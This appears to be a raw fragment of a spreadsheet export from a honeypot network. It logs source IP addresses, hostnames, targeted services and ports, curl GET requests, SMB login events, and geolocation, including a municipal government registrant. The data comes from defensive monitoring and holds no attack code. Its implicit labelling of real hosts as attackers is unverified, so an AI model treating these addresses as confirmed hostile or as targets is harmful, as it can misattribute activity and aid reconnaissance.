    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;62872&amp;&amp;7253&amp;&amp;23&amp;&amp;2938&amp;&amp;58425&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>VMAX-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:1b60:f0cc</t>
  </si>
  <si>
    <t>6ab50d84245c8b23e53e31e60745eebe</t>
  </si>
  <si>
    <t>117.206.22.211</t>
  </si>
  <si>
    <t>::ffff:75ce:16d3</t>
  </si>
  <si>
    <t>6bb9d6c688efaacaf3cd1fbb62a3770e</t>
  </si>
  <si>
    <t>202.83.16.105</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_SMB_H11</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,48139)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,48142)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64365)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,52761)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,56250)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,26494)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64440)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,59805)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60838)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54740)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,55357)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,23387)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,23395)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54834)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64851)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,64853)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,65178)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51448)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51485)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51942)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,42424)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,42472)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,51704)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,52109)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60423)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60446)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,60823)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.105,54847)}</t>
  </si>
  <si>
    <t>::ffff:ca53:1069</t>
  </si>
  <si>
    <t>9b5b850a7931c5e54dd369e96638d50d</t>
  </si>
  <si>
    <t>114.33.1.240</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-1-240.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;62284&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:1f0</t>
  </si>
  <si>
    <t>3c764ee671eb4af51637478a87df2463</t>
  </si>
  <si>
    <t>115.246.100.3</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H42&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>913&amp;&amp;3306&amp;&amp;445&amp;&amp;55460&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:73f6:6403</t>
  </si>
  <si>
    <t>60bf2103157d709d882d8549ee8819a9</t>
  </si>
  <si>
    <t>117.209.84.219</t>
  </si>
  <si>
    <t>::ffff:75d1:54db</t>
  </si>
  <si>
    <t>e347b268f9d75b08387881dd3f1b1ae1</t>
  </si>
  <si>
    <t>114.32.184.112</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-32-184-112.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:b870</t>
  </si>
  <si>
    <t>a423dd13801a3e8067f768a47abdb9c3</t>
  </si>
  <si>
    <t>220.132.174.9</t>
  </si>
  <si>
    <t>220-132-174-9.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;36164&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;43089&amp;&amp;54195</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:ae09</t>
  </si>
  <si>
    <t>fcea0f4f4ae0adba2506cb1114002aab</t>
  </si>
  <si>
    <t>125.228.158.220</t>
  </si>
  <si>
    <t>125-228-158-220.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;31876&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;15789</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:9edc</t>
  </si>
  <si>
    <t>7b8d0e5a79dd82192aa6d58874f194f6</t>
  </si>
  <si>
    <t>59.127.196.176</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-196-176.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>54218&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7f:c4b0</t>
  </si>
  <si>
    <t>6e4df35844183aa040726cb6bf74c608</t>
  </si>
  <si>
    <t>59.126.139.160</t>
  </si>
  <si>
    <t>59-126-139-160.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;44215&amp;&amp;53413&amp;&amp;80&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:8ba0</t>
  </si>
  <si>
    <t>16b801c0395f596f2412b413adb8c46f</t>
  </si>
  <si>
    <t>117.242.102.234</t>
  </si>
  <si>
    <t>::ffff:75f2:66ea</t>
  </si>
  <si>
    <t>a5f9ee1cc53e4fec68014e0115729c13</t>
  </si>
  <si>
    <t>59.98.30.101</t>
  </si>
  <si>
    <t>::ffff:3b62:1e65</t>
  </si>
  <si>
    <t>6d8571f00b779727d972a821a438ede8</t>
  </si>
  <si>
    <t>122.117.98.41</t>
  </si>
  <si>
    <t>122-117-98-41.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;10170&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:6229</t>
  </si>
  <si>
    <t>ba12c5ec8b09865f3448fca787f20276</t>
  </si>
  <si>
    <t>103.149.121.25</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>Kota Madiun</t>
  </si>
  <si>
    <t>Madiun</t>
  </si>
  <si>
    <t>1636930</t>
  </si>
  <si>
    <t>-7.6298</t>
  </si>
  <si>
    <t>111.524</t>
  </si>
  <si>
    <t>140023</t>
  </si>
  <si>
    <t>Dinas Komunikasi dan Informatika Kota Madiun</t>
  </si>
  <si>
    <t>Pemerintah Kota Madiun</t>
  </si>
  <si>
    <t>2020-03-12</t>
  </si>
  <si>
    <t>IDNIC-DISKOMINFOMADIUNKOTA-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54526)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,55044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54951)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,14201)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,53660)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,54088)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,64192)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,61170)}&amp;&amp;{Data_SMB:Incoming connection (103.149.121.25,61567)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:6795:7919</t>
  </si>
  <si>
    <t>3ac01c5401c7019da8c9dfcc9575b637</t>
  </si>
  <si>
    <t>117.216.17.48</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,59780)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,59797)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,60739)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,57519)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.216.17.48,58446)}</t>
  </si>
  <si>
    <t>::ffff:75d8:1130</t>
  </si>
  <si>
    <t>1a9b3db1720edfff805db0753e7938e2</t>
  </si>
  <si>
    <t>117.205.159.207</t>
  </si>
  <si>
    <t>302003</t>
  </si>
  <si>
    <t>26.9124</t>
  </si>
  <si>
    <t>75.7873</t>
  </si>
  <si>
    <t>::ffff:75cd:9fcf</t>
  </si>
  <si>
    <t>adaff01029915fbfccd89be76e5f35de</t>
  </si>
  <si>
    <t>220.133.134.107</t>
  </si>
  <si>
    <t>220-133-134-107.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;10003&amp;&amp;60864&amp;&amp;9017</t>
  </si>
  <si>
    <t>::ffff:dc85:866b</t>
  </si>
  <si>
    <t>53f9250eea7b36588f8ffb7f957ad26e</t>
  </si>
  <si>
    <t>13.216.241.88</t>
  </si>
  <si>
    <t>ec2-13-216-241-88.compute-1.amazonaws.com&amp;&amp;NA</t>
